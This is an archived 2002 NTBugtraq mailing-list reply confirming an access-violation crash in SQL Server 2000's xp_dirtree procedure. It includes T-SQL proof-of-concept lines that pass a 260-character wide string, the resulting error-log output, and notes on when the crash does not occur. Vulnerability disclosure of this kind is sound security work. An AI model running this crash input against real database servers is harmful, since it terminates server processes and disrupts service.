Re: Another Sql Server 7 Buffer Overflow

From: Bronek Kozicki (brok@RUBIKON.PL)
Date: 03/07/02 

Date:         Thu, 7 Mar 2002 18:34:47 +0100
From: Bronek Kozicki <brok@RUBIKON.PL>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

I can confirm this on SQL Server 2000 Service Pack 2 + Security update
Q316333, there are some mitigating factors however.

SQL Server version (from ERRORLOG):
2002-03-07 16:13:49.18 server Microsoft SQL Server 2000 - 8.00.578
(Intel X86)
 Feb 12 2002 20:54:17
 Copyright (c) 1988-2000 Microsoft Corporation
 Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 2)
[ . . . ]
2002-03-07 18:09:15.43 spid51 Using 'xpstar.dll' version '2000.80.561' to
execute extended stored procedure 'xp_dirtree'.

I used SQL code from SHATTER research team at Application Security:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',260))
3> execute xp_dirtree @test
4> go
1>

... which caused this error (from ERRORLOG again):
2002-03-07 18:09:15.48 spid51 Error: 0, Severity: 20, State: 0
2002-03-07 18:09:15.48 spid51 Stored function 'xp_dirtree' in the library
'xpstar.dll' generated an access violation. SQL Server is terminating
process 51..

Mitigating factors:

1. Argument lenght has to be exactly 260 wide characters: procedure works
smoothly if parameter string is shorter, and does return an error (ie.
parameter check) if string is longer:
1> DECLARE @test nvarchar(4000)
2> SET @test = (SELECT replicate(N'n',261))
3> execute xp_dirtree @test
4> go
Msg 22006, Level 15, State 1:
Error executing extended stored procedure: Invalid Parameter
1>

2. Problem does not occur when 8-bit characters are used (ie. narrow string)
, no matter how long string is:
1> DECLARE @test varchar(8000)
2> SET @test = (SELECT replicate('n',8000))
3> execute xp_dirtree @test
4> go
 subdirectory

              depth
 ---------------------------------------------------------------------------
--------------------------------------------------------

        --------------------------------------------------------------------
--------------------------------------------------------

        ----- -----------

1>
... above is exactly what the procedure is supposed to do.

Kind regards

B.

Relevant Pages

  • Re: Extended Stored Procedure: Loopback connection
    ... SQL Server ships a sample exactly showing this: ... SQLRETURN sret, ... SRV_PROC* srvproc); ... NULL, 0, 0, "Error executing extended stored procedure: ...
    (microsoft.public.sqlserver.odbc)
  • Re: Cannot Generate SSPI Context - help
    ... I have used the following DSN-less string: ... Microsoft OLE DB Provider for SQL Server error '80004005' ... When a connection is "trusted," it means ... > How would one connect to a remote SQL Server using Windows authen? ...
    (microsoft.public.inetserver.asp.db)
  • Re: INSERT Query problem with Quotes & Apostrophes
    ... I've got front-ends that go against both Jet and SQL Server databases. ... InputText As String, _ ... >> Delimiter, Delimiter & Delimiter) ... dDateTime, ...
    (microsoft.public.access.modulesdaovba)
  • Re: ADO.NET 2.0 saving single space to SQL?
    ... It is code someone else wrote quite some time ago and all of the string ... Hitchhiker's Guide to Visual Studio and SQL Server ... and Hitchhiker's Guide to SQL Server 2005 Compact Edition (EBook) ...
    (microsoft.public.dotnet.framework.adonet)
  • Re: Implementation of full text
    ... There is no documented way of accessing the MSSearch catalogs directly other ... tables in SQL Server to identify the row the hit occurs in. ... table to a client from an extended stored procedure. ... To use the recordset returned from the ESP as a virtual table>. ...
    (microsoft.public.sqlserver.fulltext)